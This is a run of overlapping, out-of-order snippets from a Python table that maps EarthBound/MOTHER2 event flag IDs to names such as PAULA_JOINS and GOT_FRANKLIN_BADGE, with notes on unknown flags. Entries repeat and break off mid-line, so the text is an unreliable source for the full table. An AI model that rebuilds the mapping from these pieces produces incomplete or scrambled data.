'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag for someone in Threed?)", "84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90:", "'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287 (Something about Lake Tess color", "11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17:", "show about to start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685:", "79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85:", "60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???)", "110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116:", "at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 148:", "72?) # 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287", "588 (Visibility flag for someone in Threed?) # 589 (Visibility flag for some", "defeating Giygas, but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL', 773:", "21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27:", "'DUNGEON_MAN_OPEN', # 607 (Unknown. Related to desert mine?) 
608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610:", "MOTHER2/Earthbound # Luckily, every version uses the same flag IDs FLAG_NAMES = {", "47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53:", "231 (I hate multipurpose flags) # 232 (I hate multipurpose flags) # 233", "TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY',", "to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611 (Something about", "'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5',", "'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4',", "(???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305 (???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308:", "# 160 (???) # 161 (???) # 162 (???) # 163 (???) #", "{ 1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5', 6: 'TEMP_6',", "(???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related to", "'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM',", "'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five moles defeated? How does this differ from", "# 775 (Can't get calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP',", "'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE',", "'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to", "Pokey's Room in the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629:", "to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED',", "Machine) # 377 (???) # 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) #", "'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached to the", "'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP',", "Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related to", "404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410:", "# 747 (??? 
Something about Runaway Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS',", "Hieroglyph Guardian doesn't reference this flag and never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', #", "'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP',", "496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502:", "667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER',", "549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER', 555:", "665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', #", "'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA',", "513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519:", "'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON',", "403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409:", "531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537:", "220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', #", "756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs", "responsible only for palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438:", "316 (Unknown. Something about the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER',", "'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE',", "172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', # 175 (Unknown. 
Set when you receive", "458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464:", "Topolla?) 148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150 (Related to Poo's journey) 151: 'QUEST_TO_SUBMARINE',", "754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', #", "(???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's house door knocking?) 468:", "103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text 104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', # 106", "706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712:", "287 (Something about Lake Tess color palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED',", "751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757:", "# 625 (Something about \"Fancy Pokey\" in the Monotoli Building) -- Got kicked", "# 771 (???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457", "'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', # 747", "377 (???) # 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) # 381 (???)", "'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD',", "'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian doesn't reference this flag and never fights", "'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER',", "(Unknown. Set after Apple Kid calls you about the Gourmet Yogurt Machine) #", "631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637:", "Related to Ness's house door knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471:", "'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY',", "TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596", "# 161 (???) # 162 (???) # 163 (???) # 164 (???) 165:", "'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE',", "Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 
148: 'READ_HIEROGLYPHS', 149:", "'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate multipurpose flags) # 227", "shyness book\"? This flag is set even if you don't talk to Apple", "685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691:", "411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417:", "573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579:", "talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131:", "755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag", "flag is set even if you don't talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1',", "'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING',", "217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223:", "'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT',", "475 (Handles continue yes/no on death. TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478:", "'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT',", "141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related to Bulldozer at Fourside", "after Apple Kid calls you about the Gourmet Yogurt Machine) # 377 (???)", "'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED',", "740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746:", "\"can search for shyness book\"? This flag is set even if you don't", "CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 
597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600:", "'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for", "'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL',", "'PARTY_IS_ROBOTIFIED', # 373 (Unknown. Related to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', #", "# 376 (Unknown. Set after Apple Kid calls you about the Gourmet Yogurt", "'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1',", "'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED',", "NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls from Dad?)", "52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague at beginning of expanded mine?) #", "'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY',", "multipurpose flags) # 229 (I hate multipurpose flags) # 230 (I hate multipurpose", "'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER',", "'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP',", "'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA',", "'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five moles", "'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE',", "779 (Related to PREVENT_TELEPORT?) # 780 (If set, Maxwell doesn't actually save your", "136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH',", "to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376 (Unknown. 
Set after Apple", "614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn.", "'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN',", "'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT',", "Pokey\" in the Monotoli Building) -- Got kicked out of Pokey's Room in", "384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached to", "559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565:", "134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 